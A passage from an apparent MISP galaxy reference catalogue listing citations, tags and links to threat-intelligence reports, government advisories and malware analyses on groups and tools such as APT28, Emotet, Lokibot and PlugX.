Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.

The tag is: misp-galaxy:references="Trend Micro Deep Dive Into Defacement"

Table 12506. Table References

Links

https://documents.trendmicro.com/assets/white_papers/wp-a-deep-dive-into-defacement.pdf

Talos Lokibot Jan 2021

Muhammad, I., Unterbrink, H.. (2021, January 6). A Deep Dive into Lokibot Infection Chain. Retrieved August 31, 2021.

The tag is: misp-galaxy:references="Talos Lokibot Jan 2021"

Table 12507. Table References

Links

https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html

Malwarebytes Saint Bot April 2021

Hasherezade. (2021, April 6). A deep dive into Saint Bot, a new downloader. Retrieved June 9, 2022.

The tag is: misp-galaxy:references="Malwarebytes Saint Bot April 2021"

Table 12508. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/

SecurityScorecard CredoMap September 2022

Vlad Pasca. (2022, September 27). A Deep Dive Into the APT28’s stealer called CredoMap. Retrieved December 5, 2023.

The tag is: misp-galaxy:references="SecurityScorecard CredoMap September 2022"

Table 12509. Table References

Links

https://securityscorecard.com/research/apt28s-stealer-called-credomap/

Krebs DNS Hijack 2019

Brian Krebs. (2019, February 18). A Deep Dive on the Recent Widespread DNS Hijacking Attacks. Retrieved February 14, 2022.

The tag is: misp-galaxy:references="Krebs DNS Hijack 2019"

Table 12510. Table References

Links

https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/

Reaqta MuddyWater November 2017

Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.

The tag is: misp-galaxy:references="Reaqta MuddyWater November 2017"

Table 12511. Table References

Links

https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/

ESET Turla PowerShell May 2019

Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.

The tag is: misp-galaxy:references="ESET Turla PowerShell May 2019"

Table 12512. Table References

Links

https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/

Kubernetes Admission Controllers

Kubernetes. (n.d.). Admission Controllers Reference. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Kubernetes Admission Controllers"

Table 12513. Table References

Links

https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers

Krebs Adobe

Brian Krebs. (2013, October 3). Adobe To Announce Source Code, Customer Data Breach. Retrieved May 17, 2021.

The tag is: misp-galaxy:references="Krebs Adobe"

Table 12514. Table References

Links

https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/

Github AD-Pentest-Script

Twi1ight. (2015, July 11). AD-Pentest-Script - wmiexec.vbs. Retrieved June 29, 2017.

The tag is: misp-galaxy:references="Github AD-Pentest-Script"

Table 12515. Table References

Links

https://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs

adplus.exe - LOLBAS Project

LOLBAS. (2021, September 1). adplus.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="adplus.exe - LOLBAS Project"

Table 12516. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/

Microsoft ADV170021 Dec 2017

Microsoft. (2017, December 12). ADV170021 - Microsoft Office Defense in Depth Update. Retrieved February 3, 2018.

The tag is: misp-galaxy:references="Microsoft ADV170021 Dec 2017"

Table 12517. Table References

Links

https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021

FireEye APT Groups

FireEye. (n.d.). Advanced Persistent Threat Groups. Retrieved August 3, 2018.

The tag is: misp-galaxy:references="FireEye APT Groups"

Table 12518. Table References

Links

https://www.fireeye.com/current-threats/apt-groups.html#apt19

Mandiant APT Groups List

Mandiant. (n.d.). Advanced Persistent Threats (APTs). Retrieved September 14, 2023.

The tag is: misp-galaxy:references="Mandiant APT Groups List"

Table 12519. Table References

Links

https://www.mandiant.com/resources/insights/apt-groups

Advanced_sec_audit_policy_settings

Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021.

The tag is: misp-galaxy:references="Advanced_sec_audit_policy_settings"

Table 12520. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings

CrowdStrike Richochet Chollima September 2021

CrowdStrike. (2021, September 30). Adversary Profile - Ricochet Chollima. Retrieved September 30, 2021.

The tag is: misp-galaxy:references="CrowdStrike Richochet Chollima September 2021"

Table 12521. Table References

Links

https://www.crowdstrike.com/adversaries/ricochet-chollima/

Elastic - Hunting for Persistence Part 1

French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020.

The tag is: misp-galaxy:references="Elastic - Hunting for Persistence Part 1"

Table 12522. Table References

Links

https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1

NCSC APT29 July 2020

National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.

The tag is: misp-galaxy:references="NCSC APT29 July 2020"

Table 12523. Table References

Links

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf

Advpack.dll - LOLBAS Project

LOLBAS. (2018, May 25). Advpack.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Advpack.dll - LOLBAS Project"

Table 12524. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Advpack/

Kaspersky Adwind Feb 2016

Kamluk, V. & Gostev, A. (2016, February). Adwind - A Cross-Platform RAT. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Kaspersky Adwind Feb 2016"

Table 12525. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07195002/KL_AdwindPublicReport_2016.pdf

Bitdefender Trickbot VNC module Whitepaper 2021

Radu Tudorica. (2021, July 12). A Fresh Look at Trickbot’s Ever-Improving VNC Module. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Bitdefender Trickbot VNC module Whitepaper 2021"

Table 12526. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf

Mac Backdoors are back

Dan Goodin. (2016, July 6). After hiatus, in-the-wild Mac backdoors are suddenly back. Retrieved July 8, 2017.

The tag is: misp-galaxy:references="Mac Backdoors are back"

Table 12527. Table References

Links

https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/

Kaspersky MSSQL Aug 2019

Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote attack on Microsoft SQL Server. Retrieved September 4, 2019.

The tag is: misp-galaxy:references="Kaspersky MSSQL Aug 2019"

Table 12528. Table References

Links

https://securelist.com/malicious-tasks-in-ms-sql-server/92167/

Securelist Agent.btz

Gostev, A.. (2014, March 12). Agent.btz: a Source of Inspiration?. Retrieved April 8, 2016.

The tag is: misp-galaxy:references="Securelist Agent.btz"

Table 12529. Table References

Links

https://securelist.com/agent-btz-a-source-of-inspiration/58551/

ThreatExpert Agent.btz

Shevchenko, S.. (2008, November 30). Agent.btz - A Threat That Hit Pentagon. Retrieved April 8, 2016.

The tag is: misp-galaxy:references="ThreatExpert Agent.btz"

Table 12530. Table References

Links

http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html

AgentExecutor.exe - LOLBAS Project

LOLBAS. (2020, July 23). AgentExecutor.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="AgentExecutor.exe - LOLBAS Project"

Table 12531. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/

SentinelLabs Agent Tesla Aug 2020

Walter, J. (2020, August 10). Agent Tesla | Old RAT Uses New Tricks to Stay on Top. Retrieved December 11, 2020.

The tag is: misp-galaxy:references="SentinelLabs Agent Tesla Aug 2020"

Table 12532. Table References

Links

https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/

ATT Sidewinder January 2021

Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021.

The tag is: misp-galaxy:references="ATT Sidewinder January 2021"

Table 12533. Table References

Links

https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf

Harmj0y Domain Trusts

Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019.

The tag is: misp-galaxy:references="Harmj0y Domain Trusts"

Table 12534. Table References

Links

https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944

airwalk backdoor unix systems

airwalk. (2023, January 1). A guide to backdooring Unix systems. Retrieved May 31, 2023.

The tag is: misp-galaxy:references="airwalk backdoor unix systems"

Table 12535. Table References

Links

http://www.ouah.org/backdoors.html

Wired Lockergoga 2019

Greenberg, A. (2019, March 25). A Guide to LockerGoga, the Ransomware Crippling Industrial Firms. Retrieved July 17, 2019.

The tag is: misp-galaxy:references="Wired Lockergoga 2019"

Table 12536. Table References

Links

https://www.wired.com/story/lockergoga-ransomware-crippling-industrial-firms/

ZDNET Selling Data

Cimpanu, C. (2020, May 9). A hacker group is selling more than 73 million user records on the dark web. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="ZDNET Selling Data"

Table 12537. Table References

Links

https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/

ESET Zebrocy May 2019

ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.

The tag is: misp-galaxy:references="ESET Zebrocy May 2019"

Table 12538. Table References

Links

https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/

Microsoft AKS Azure AD 2023

Microsoft. (2023, February 27). AKS-managed Azure Active Directory integration. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Microsoft AKS Azure AD 2023"

Table 12539. Table References

Links

https://learn.microsoft.com/en-us/azure/aks/managed-aad

US-CERT SamSam 2018

US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019.

The tag is: misp-galaxy:references="US-CERT SamSam 2018"

Table 12540. Table References

Links

https://www.us-cert.gov/ncas/alerts/AA18-337A

CISA MSS Sep 2020

CISA. (2020, September 14). Alert (AA20-258A): Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. Retrieved October 1, 2020.

The tag is: misp-galaxy:references="CISA MSS Sep 2020"

Table 12541. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa20-258a

CISA Lokibot September 2020

DHS/CISA. (2020, September 22). Alert (AA20-266A) LokiBot Malware . Retrieved September 15, 2021.

The tag is: misp-galaxy:references="CISA Lokibot September 2020"

Table 12542. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/aa20-266a

CISA_AA21_200B

CISA. (2021, August 20). Alert (AA21-200B) Chinese State-Sponsored Cyber Operations: Observed TTPs. Retrieved June 21, 2022.

The tag is: misp-galaxy:references="CISA_AA21_200B"

Table 12543. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa21-200b

cisa_malware_orgs_ukraine

CISA. (2022, April 28). Alert (AA22-057A) Update: Destructive Malware Targeting Organizations in Ukraine. Retrieved July 29, 2022.

The tag is: misp-galaxy:references="cisa_malware_orgs_ukraine"

Table 12544. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa22-057a

US-CERT Ransomware 2016

US-CERT. (2016, March 31). Alert (TA16-091A): Ransomware and Recent Variants. Retrieved March 15, 2019.

The tag is: misp-galaxy:references="US-CERT Ransomware 2016"

Table 12545. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA16-091A

US-CERT WannaCry 2017

US-CERT. (2017, May 12). Alert (TA17-132A): Indicators Associated With WannaCry Ransomware. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="US-CERT WannaCry 2017"

Table 12546. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-132A

US-CERT HIDDEN COBRA June 2017

US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017.

The tag is: misp-galaxy:references="US-CERT HIDDEN COBRA June 2017"

Table 12547. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-164A

US-CERT NotPetya 2017

US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.

The tag is: misp-galaxy:references="US-CERT NotPetya 2017"

Table 12548. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-181A

US-CERT APT Energy Oct 2017

US-CERT. (2017, October 20). Alert (TA17-293A): Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved November 2, 2017.

The tag is: misp-galaxy:references="US-CERT APT Energy Oct 2017"

Table 12549. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-293A

US-CERT FALLCHILL Nov 2017

US-CERT. (2017, November 22). Alert (TA17-318A): HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL. Retrieved December 7, 2017.

The tag is: misp-galaxy:references="US-CERT FALLCHILL Nov 2017"

Table 12550. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-318A

US-CERT Volgmer Nov 2017

US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer. Retrieved December 7, 2017.

The tag is: misp-galaxy:references="US-CERT Volgmer Nov 2017"

Table 12551. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-318B

US-CERT TA18-074A

US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.

The tag is: misp-galaxy:references="US-CERT TA18-074A"

Table 12552. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA18-074A

US-CERT-TA18-106A

US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="US-CERT-TA18-106A"

Table 12553. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA18-106A

US-CERT Emotet Jul 2018

US-CERT. (2018, July 20). Alert (TA18-201A) Emotet Malware. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="US-CERT Emotet Jul 2018"

Table 12554. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA18-201A

AlKhaser Debug

Noteworthy. (2019, January 6). Al-Khaser. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="AlKhaser Debug"

Table 12555. Table References

Links

https://github.com/LordNoteworthy/al-khaser/tree/master/al-khaser/AntiDebug

Fysbis Palo Alto Analysis

Bryan Lee and Rob Downs. (2016, February 12). A Look Into Fysbis: Sofacy’s Linux Backdoor. Retrieved September 10, 2017.

The tag is: misp-galaxy:references="Fysbis Palo Alto Analysis"

Table 12556. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/

Medium KONNI Jan 2020

Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020.

The tag is: misp-galaxy:references="Medium KONNI Jan 2020"

Table 12557. Table References

Links

https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b

Unit 42 Palo Alto Ransomware in Public Clouds 2022

Jay Chen. (2022, May 16). A Look Into Public Clouds From the Ransomware Actor’s Perspective. Retrieved March 21, 2023.

The tag is: misp-galaxy:references="Unit 42 Palo Alto Ransomware in Public Clouds 2022"

Table 12558. Table References

Links

https://unit42.paloaltonetworks.com/ransomware-in-public-clouds/

Cyber Centre ALPHV/BlackCat July 25 2023

Canadian Centre for Cyber Security. (2023, July 25). ALPHV/BlackCat Ransomware Targeting of Canadian Industries. Retrieved September 13, 2023.

The tag is: misp-galaxy:references="Cyber Centre ALPHV/BlackCat July 25 2023"

Table 12559. Table References

Links

https://www.cyber.gc.ca/en/alerts-advisories/alphvblackcat-ransomware-targeting-canadian-industries

Microsoft ADS Mar 2014

Marlin, J. (2013, March 24). Alternate Data Streams in NTFS. Retrieved March 21, 2018.

The tag is: misp-galaxy:references="Microsoft ADS Mar 2014"

Table 12560. Table References

Links

https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/

XPNSec PPID Nov 2017

Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="XPNSec PPID Nov 2017"

Table 12561. Table References

Links

https://blog.xpnsec.com/becoming-system/

Microsoft AlwaysInstallElevated 2018

Microsoft. (2018, May 31). AlwaysInstallElevated. Retrieved December 14, 2020.

The tag is: misp-galaxy:references="Microsoft AlwaysInstallElevated 2018"

Table 12562. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated

Amazon Snapshots

Amazon. (n.d.). Amazon EBS snapshots. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Amazon Snapshots"

Table 12563. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html

Amazon AMI

Amazon. (n.d.). Amazon Machine Images (AMI). Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Amazon AMI"

Table 12564. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html

Amazon S3

Amazon. (n.d.). Amazon S3. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Amazon S3"

Table 12565. Table References

Links

https://aws.amazon.com/s3/

Trend Micro S3 Exposed PII, 2017

Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed Almost 50 Thousand PII in Australia. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Trend Micro S3 Exposed PII, 2017"

Table 12566. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia

Recorded Future Beacon Certificates

Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying Rogue Cobalt Strike Servers. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="Recorded Future Beacon Certificates"

Table 12567. Table References

Links

https://www.recordedfuture.com/cobalt-strike-servers/

Botnet Scan

Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from a Botnet. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Botnet Scan"

Table 12568. Table References

Links

https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf

Trend Micro Ngrok September 2020

Borja, A. Camba, A. et al (2020, September 14). Analysis of a Convoluted Attack Chain Involving Ngrok. Retrieved September 15, 2020.

The tag is: misp-galaxy:references="Trend Micro Ngrok September 2020"

Table 12569. Table References

Links

https://www.trendmicro.com/en_us/research/20/i/analysis-of-a-convoluted-attack-chain-involving-ngrok.html

CIRCL PlugX March 2013

Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="CIRCL PlugX March 2013"

Table 12570. Table References

Links

http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf

Apple Unified Log Analysis Remote Login and Screen Sharing

Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.

The tag is: misp-galaxy:references="Apple Unified Log Analysis Remote Login and Screen Sharing"

Table 12571. Table References

Links

https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins

Medium S2W WhisperGate January 2022

S2W. (2022, January 18). Analysis of Destructive Malware (WhisperGate) targeting Ukraine. Retrieved March 14, 2022.

The tag is: misp-galaxy:references="Medium S2W WhisperGate January 2022"

Table 12572. Table References

Links

https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3

Analysis of FG-IR-22-369

Guillaume Lovet and Alex Kong. (2023, March 9). Analysis of FG-IR-22-369. Retrieved May 15, 2023.

The tag is: misp-galaxy:references="Analysis of FG-IR-22-369"

Table 12573. Table References

Links

https://www.fortinet.com/blog/psirt-blogs/fg-ir-22-369-psirt-analysis

Graeber 2014

Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="Graeber 2014"

Table 12574. Table References

Links

http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html

Fortinet Agent Tesla April 2018

Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Fortinet Agent Tesla April 2018"

Table 12575. Table References

Links

https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html

Antiy CERT Ramsay April 2020

Antiy CERT. (2020, April 20). Analysis of Ramsay components of Darkhotel’s infiltration and isolation network. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Antiy CERT Ramsay April 2020"

Table 12576. Table References

Links

https://www.programmersought.com/article/62493896999/

Storm-0558 techniques for unauthorized email access

Microsoft Threat Intelligence. (2023, July 14). Analysis of Storm-0558 techniques for unauthorized email access. Retrieved September 18, 2023.

The tag is: misp-galaxy:references="Storm-0558 techniques for unauthorized email access"

Table 12577. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/

ESET Telebots July 2017

Cherepanov, A.. (2017, July 4). Analysis of TeleBots’ cunning backdoor . Retrieved June 11, 2020.

The tag is: misp-galaxy:references="ESET Telebots July 2017"

Table 12578. Table References

Links

https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/

EST Kimsuky SmokeScreen April 2019

ESTSecurity. (2019, April 17). Analysis of the APT Campaign ‘Smoke Screen’ targeting to Korea and US 출처: https://blog.alyac.co.kr/2243 [이스트시큐리티 알약 블로그]. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="EST Kimsuky SmokeScreen April 2019"

Table 12579. Table References

Links

https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf

Ukraine15 - EISAC - 201603

Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems. (2016, March 18). Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case. Retrieved March 27, 2018.

The tag is: misp-galaxy:references="Ukraine15 - EISAC - 201603"

Table 12580. Table References

Links

https://nsarchive.gwu.edu/sites/default/files/documents/3891751/SANS-and-Electricity-Information-Sharing-and.pdf

Check Point Havij Analysis

Ganani, M. (2015, May 14). Analysis of the Havij SQL Injection tool. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="Check Point Havij Analysis"

Table 12581. Table References

Links

https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/

ESET Emotet Dec 2018

Perez, D.. (2018, December 28). Analysis of the latest Emotet propagation campaign. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="ESET Emotet Dec 2018"

Table 12582. Table References

Links

https://www.welivesecurity.com/2018/12/28/analysis-latest-emotet-propagation-campaign/

Rewterz Sidewinder COVID-19 June 2020

Rewterz. (2020, June 22). Analysis on Sidewinder APT Group – COVID-19. Retrieved January 29, 2021.

The tag is: misp-galaxy:references="Rewterz Sidewinder COVID-19 June 2020"

Table 12583. Table References

Links

https://www.rewterz.com/articles/analysis-on-sidewinder-apt-group-covid-19

CISA AR18-352A Quasar RAT December 2018

CISA. (2018, December 18). Analysis Report (AR18-352A) Quasar Open-Source Remote Administration Tool. Retrieved August 1, 2022.

The tag is: misp-galaxy:references="CISA AR18-352A Quasar RAT December 2018"

Table 12584. Table References

Links

https://www.cisa.gov/uscert/ncas/analysis-reports/AR18-352A

CISA AR21-126A FIVEHANDS May 2021

CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.

The tag is: misp-galaxy:references="CISA AR21-126A FIVEHANDS May 2021"

Table 12585. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a

JoeSecurity Egregor 2020

Joe Security. (n.d.). Analysis Report fasm.dll. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="JoeSecurity Egregor 2020"

Table 12586. Table References

Links

https://www.joesandbox.com/analysis/318027/0/html

GDATA Zeus Panda June 2017

Ebach, L. (2017, June 22). Analysis Results of Zeus.Variant.Panda. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="GDATA Zeus Panda June 2017"

Table 12587. Table References

Links

https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf

jstnk9.github.io June 01 2022

jstnk9.github.io. (2022, June 1). Analyzing AsyncRAT distributed in Colombia | Welcome to Jstnk webpage. Retrieved May 7, 2023.

The tag is: misp-galaxy:references="jstnk9.github.io June 01 2022"

Table 12588. Table References

Links

https://jstnk9.github.io/jstnk9/research/AsyncRAT-Analysis/

Analyzing CS Dec 2020

Maynier, E. (2020, December 20). Analyzing Cobalt Strike for Fun and Profit. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="Analyzing CS Dec 2020"

Table 12589. Table References

Links

https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/

Uperesia Malicious Office Documents

Felix. (2016, September). Analyzing Malicious Office Documents. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Uperesia Malicious Office Documents"

Table 12590. Table References

Links

https://www.uperesia.com/analyzing-malicious-office-documents

Unit42 OilRig Nov 2018

Falcone, R., Wilhoit, K.. (2018, November 16). Analyzing OilRig’s Ops Tempo from Testing to Weaponization to Delivery. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Unit42 OilRig Nov 2018"

Table 12591. Table References

Links

https://unit42.paloaltonetworks.com/unit42-analyzing-oilrigs-ops-tempo-testing-weaponization-delivery/

McAfee GhostSecret

Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.

The tag is: misp-galaxy:references="McAfee GhostSecret"

Table 12592. Table References

Links

https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/

Microsoft Analyzing Solorigate Dec 2020

MSTIC. (2020, December 18). Analyzing Solorigate, the compromised DLL file that started a sophisticated cyberattack, and how Microsoft Defender helps protect customers . Retrieved January 5, 2021.

The tag is: misp-galaxy:references="Microsoft Analyzing Solorigate Dec 2020"

Table 12593. Table References

Links

https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

Lastline PlugX Analysis

Vasilenko, R. (2013, December 17). An Analysis of PlugX Malware. Retrieved November 24, 2015.

The tag is: misp-galaxy:references="Lastline PlugX Analysis"

Table 12594. Table References

Links

http://labs.lastline.com/an-analysis-of-plugx

TrendMicro Sandworm October 2014

Wu, W. (2014, October 14). An Analysis of Windows Zero-day Vulnerability ‘CVE-2014-4114’ aka “Sandworm”. Retrieved June 18, 2020.

The tag is: misp-galaxy:references="TrendMicro Sandworm October 2014"

Table 12595. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/

Dragos Crashoverride 2018

Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="Dragos Crashoverride 2018"

Table 12596. Table References

Links

https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf

Syscall 2014

Drysdale, D. (2014, July 16). Anatomy of a system call, part 2. Retrieved June 16, 2020.

The tag is: misp-galaxy:references="Syscall 2014"

Table 12597. Table References

Links

https://lwn.net/Articles/604515/

SCADAfence_ransomware

Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.

The tag is: misp-galaxy:references="SCADAfence_ransomware"

Table 12598. Table References

Links

https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf

ESET IIS Malware 2021

Hromcová, Z., Cherepanov, A. (2021). Anatomy of Native IIS Malware. Retrieved September 9, 2021.

The tag is: misp-galaxy:references="ESET IIS Malware 2021"

Table 12599. Table References

Links

https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf

Medium Anchor DNS July 2020

Grange, W. (2020, July 13). Anchor_dns malware goes cross platform. Retrieved September 10, 2020.

The tag is: misp-galaxy:references="Medium Anchor DNS July 2020"

Table 12600. Table References

Links

https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30

NSA Joint Advisory SVR SolarWinds April 2021

NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.

The tag is: misp-galaxy:references="NSA Joint Advisory SVR SolarWinds April 2021"

Table 12601. Table References

Links

https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF

Kaspersky Andariel Ransomware June 2021

Park, S. (2021, June 15). Andariel evolves to target South Korea with ransomware. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="Kaspersky Andariel Ransomware June 2021"

Table 12602. Table References

Links

https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/

RFC826 ARP

Plummer, D. (1982, November). An Ethernet Address Resolution Protocol. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="RFC826 ARP"

Table 12603. Table References

Links

https://tools.ietf.org/html/rfc826

